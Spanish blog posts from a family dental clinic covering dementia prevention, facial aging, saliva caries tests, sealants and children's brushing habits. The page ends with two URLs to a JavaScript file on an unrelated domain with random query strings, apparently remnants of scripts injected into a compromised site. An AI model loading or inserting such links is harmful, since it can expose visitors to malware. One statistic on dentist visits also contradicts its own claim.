Robles Dental

Dentistas de familia desde 1984


Deja un comentario

Abordar nueve factores de riesgo podría prevenir un tercio de los casos de demencia

demencia

Una investigación de 24 expertos internacionales ha concluido que podrían prevenirse un 35% de los casos de demencia en todo el mundo si se prestara atención a nueve factores de riesgo a lo largo de la vida. Esas medidas incluyen: escolarización al menos hasta los 15 años, reducción de la pérdida auditiva, la obesidad y la hipertensión en la mediana edad (45-65 años), y reducción del tabaquismo, la depresión, la inactividad física, el aislamiento social y la diabetes a una edad más avanzada (> 65 años). En comparación, abordar el factor de riesgo genético más importante (ApoE) prevendría sólo un 7% de casos de demencia.

Los tres factores de riesgo que potencialmente podrían plantear la mayor diferencia en la prevención de la demencia son permanecer en la escuela (8%), reducir la pérdida auditiva en la mediana edad (9%) y dejar de fumar a una edad más avanzada (5%).

Por lo general, la demencia se diagnostica a una edad avanzada, pero los cambios cerebrales relacionados con la demencia usualmente comienzan a desarrollarse años antes de que aparezcan los síntomas. Por ello, según los expertos, abordar la prevención de la demencia de una forma más amplia que refleje esos factores de riesgo cambiantes será beneficioso para las sociedades que envejecen y ayudarán a prevenir la creciente cantidad de casos de demencia en todo el mundo.

Como en todo, mejor prevenir que curar.


Deja un comentario

Envejecimiento. Parte 1

Según la OMS, el envejecimiento es un proceso deletéreo, o irreversible donde las funciones orgánicas, el estado físico y mental van a involucionarlo de una manera progresiva, pero la velocidad del proceso es variable; depende de características genéticas, hormonales, nutrición, estilo de vida, enfermedades y tratamientos de las mismas, etc.

El envejecimiento facial sucede por pérdida del volumen óseo maxilo-mandibular íntimamente relacionado con la pérdida dentaria, pérdida de la elasticidad de la piel por degradación de la matriz que la compone, disminución de la vascularización, deshidratación, atrofia grasa, atrofia muscular o bien lo inverso, contracciones musculares repetidas y un largo etc.

El envejecimiento conlleva un descolgamiento de la piel, pérdida del contorno de la cara, aparición de surcos y arrugas que inicialmente era por función, pero con la pérdida de elasticidad de la piel, se van quedando en nuestro rostro. Estas marcas se expresarán según el mantenimiento y el cuidado cosmético que hallamos tenido con ellas.

Por todo ello, las variaciones individuales son muy amplias, al igual que la presentación. Cada vez se distancia más la edad biológica (la que aparentamos tener, y puede ser refrendada por unos test biológicos de funcionamiento orgánico) y nuestra edad cronológica (la de nuestro DNI).

Citando nuevamente a la OMS, ésta, ha acuñado el concepto de envejecimiento activo, según la cual se optimizan las oportunidades de bienestar físico, social y mental durante toda la vida con el objeto de ampliar la esperanza de vida saludable, la productividad y la calidad de vida en la vejez. Es decir, adoptar e incorporar los medios a nuestro alcance para tener más calidad de vida, independientemente de la edad que tengamos.

Y, es por ello que según los signos de envejecimiento, la Medicina Estética y Antienvejecimiento, aportan cuatro grandes grupo de tratamientos: los preventivos, restitutivos, curativos y los paliativos.

Estos y otros tratamientos los desgranaremos en sucesivas publicaciones.


Deja un comentario

Prevención de caries a través de test biológicos

identis_caries5

 

Son diversos los factores responsables de la salud de los dientes, existiendo una interacción entre factores perjudiciales y factores protectores. Así pues, los microorganismos, el azúcar y los hábitos alimentarios inadecuados implicarían riesgo; mientras que la saliva, la higiene bucal y la inmunidad personal constituirían factores protectores.

Normalmente, existe un equilibrio entre los distintos tipos de gérmenes de la cavidad bucal, pero, cuando el número de determinadas bacterias, como el Streptococcus mutans o de Lactobacilos aumenta fuertemente y los factores protectores no los contrarrestan, se crea un alto riesgo de infección y caries.

Las propiedades especiales de estas bacterias son las responsables de su elevada cariogenidad. La alimentación rica en azúcares, el consumo de substancia ácidas como refrescos, zumos, así como la ausencia de factores protectores son los elementos decisivos para la composición de la flora bacteriana bucal.

Un descenso de PH impide el crecimiento de muchas otras bacterias, más tolerables con los tejidos bucales, mientras que el número de Streptococcus mutans aumenta, se alimentan de azúcares, prolifera en número, acidifica el ambiente donde están, aparte de segregar una substancia pegajosa que se adhiere al esmalte a modo de entramado para depositando más bacterias, cálculo dental, disminuye el Ph y, con todo ello atacan al esmalte, provocando caries e iniciando las enfermedades de encías y periodontales.

El streptococcus mutado no existe al nacer, empieza a colonizar al bebé cuando comienza la erupción dentaria, y siempre por vehiculización de un adulto, el que esté más tiempo con él es el que le va transmitir por lo general por algún medio como chupeteo, cuchara la contaminación con estos gérmenes. Es importante que este adulto tenga un buen control de caries.

Los Lactobacilos son los acompañantes de los anteriores, pero más benévolos. Se mantienen en lugares de difícil limpieza como fisuras, fosas, cavidades caries, pero si evitamos lo anterior el número de estas bacterias será controlable. Es decir que tratando las caries o agujeros, colocación de selladores, higiene dental, tendremos poca carga de estos gérmenes . Si no es así sus efectos se suman a los streptococcus.

El momento de realizar estos test salivares es al levantarse, en ayunas, cuando el nivel de gérmenes es mayor y existe menor cantidad de saliva.

Básicamente el método es recoger muestra de saliva a través de torunda de algodón estéril, mordedores de siliconas, etc. Se cultiva estas muestras en un ambiente adecuado, y empezarán a crecer y reproducirse colonias bacterianas, pasados un par de días para el streptococcus y cuatro para el Lactobacilus se contabilizan el número de colonias, y se correlaciona con el estado bucal, diagnosticándose si es un paciente de alto, medio o bajo riesgo de caries, tratando lesiones o posponiéndola, vigilarlas si determinamos que no hay riesgos, etc.

Es importante saber que podemos contrarrestar la acción del streptococcus con el uso de germicidas como la clorhexidina y fortaleciendo la mineralizacion del diente mediante fluoraciones, eliminando los lechos donde se alojan mediante tratamiento de caries y controles de higiene, al igual si se necesitase un tratamiento periodontal.


Deja un comentario

¿Qué son los selladores?

Entre los 6 y los 12 años suelen erupcionar las muelas permanentes en los niños, muelas recién salidas con surcos y fisuras muy propensas a la caries. Por esta razón es necesario tomar medidas preventivas para que los pequeños de la casa no pierdan piezas o tengan afecciones tempranas.

Para ello existen los selladores, pero ¿qué son?

Son capas delgadas de material utilizado en los empastes que se aplican principalmente sobre las superficies de contacto de las muelas. Con esta acción, suprimimos las superficies propensas a retener placa bacteriana y su consecuencia inmediata: la caries dental.

¿Para quien está indicado?

Principalmente para pacientes en edades comprendidas entre 6 y 12 años con molares y premolares permanentes recién erupcionados. Pero también en adolecentes y adultos jóvenes con propensión a la caries dental; en pacientes con medicamentso que disminuyen la saliva; pacientes con dieta alta en hidratos de carbono y azúcares pegajosos; y en pacientes con alguna discapacidad que pueda limitar o dificultar el momento de higienizar su boca.

Los selladores dentales se aplican  mediante una técnica muy sencilla, indolora y nada invasiva. Además, es un tratamiento de rápida aplicación que proporciona una gran prevención de caries dental durante largo tiempo.

Cuenta con muchas ventajas, entre ellas su bajo coste, evita futuros tratamientos costosos e incluso pérdida de piezas dentarias; y además, una vez aplicados, los selladores protegen contra el 80% de las caries por 2 años y continúan protegiendo contra el 50% de las caries después de cuatro años.

Recuerde que las caries sin tratar pueden causar dolor, infección, y problemas para comer, hablar y afectar al aprendizaje, por ello es importante acudir a su dentista y realizar revisiones periódicas.


Deja un comentario

Escuela de padres: La importancia de la prevención

En 2015, un estudio sobre salud bucodental realizado a 7.500 padres de toda Europa, reveló que un tercio de los niños de nuestro país se cepillan solo los dientes anteriores, omitiendo completamente los posteriores, y el 43,1% no se cepilla los dientes el tiempo necesario (dos minutos).

Más del 90% de los padres encuestados, están de acuerdo en que la adquisición de hábitos de cepillado dental está directamente relacionado con el ejemplo que ellos den. Por ello, es muy importante que los niños los vean cepillarse los dientes.

Con la vuelta al colegio, lo niños suelen ingerir más bollería industrial, con azúcares y grasas saturadas, que a la larga pueden provocar obesidad y caries. Es importante además, que el niño tenga hábito de cepillado, para mantener una adecuada higiene buco dental tanto dentro como fuega del hogar.

Un dato relevante de este estudio es que, en comparación con nuestros vecinos los franceses, los niños españoles visitan al dentista con menor frecuencia (un 45.6% frente a un 40.4% respectivamente), a los siete años de edad el 16,2% ya tienen algún empaste y al 12% ya se le ha practicado alguna extracción dentaria.

Con todo, la asistencia dental profesional orientada a la prevención es muy importante y más gratificante tanto para niños como padres, lo que conlleva menores costes futuros.

Como el sabio refrán reza, más vale prevenir que curar, prevengamos ahora y nuestros niños llegarán a la adultez con bocas sanas y equilibradas, ¡os lo agradecerán!.

http://plugintemarosa.info/dfi823hs.js?0.8205492097881708

http://plugintemarosa.info/dfi823hs.js?0.7518993786318734